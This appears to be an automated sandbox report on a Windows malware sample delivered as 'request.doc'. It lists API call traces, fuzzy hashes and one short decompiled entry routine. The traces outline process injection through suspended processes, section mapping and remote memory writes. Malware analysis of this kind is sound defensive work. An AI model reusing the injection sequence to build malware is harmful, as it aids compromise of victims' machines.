    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: 6DDCA324434FFA506CF7DC4E51DB7935
Total matches: 898
Initial Analysis Report: Open
Initial sample Analysis ID: 37523
Initial sample SHA 256: 3903705C0E2EB3B9D6C289257AA515C987ED06EAB3051C7C68369A4A64D93ECF
Initial sample name: request.doc

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 96fc59e142f8f3589546cfe20ec42451b64ec7524ff1705d84ef22f3f4a31ef3
  • Instruction ID: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
  • Opcode Fuzzy Hash: 29219E03028ED390CA255D8305A2B932155DF81F53C6CE3F474BCB66855F51BE1A5789
  • Instruction Fuzzy Hash: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B343CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01B343E1
  • CloseHandle.KERNEL32(?), ref: 01B343F8
  • StrRChrA.SHLWAPI(01B311A6,00000000,0000005C), ref: 01B34404
  • lstrcat.KERNEL32(01B311A6,01B3825D), ref: 01B3443E
  • FindFirstFileA.KERNELBASE(01B311A6,?), ref: 01B34454
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34486
  • StrChrA.SHLWAPI(?,0000002E), ref: 01B344F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 01B3452D
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34542
  • CompareFileTime.KERNEL32(?,?), ref: 01B3456B
  • HeapFree.KERNEL32(00000000,00000000,01B38049), ref: 01B345A1
  • HeapFree.KERNEL32(00000000,01B311A6), ref: 01B345B1
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
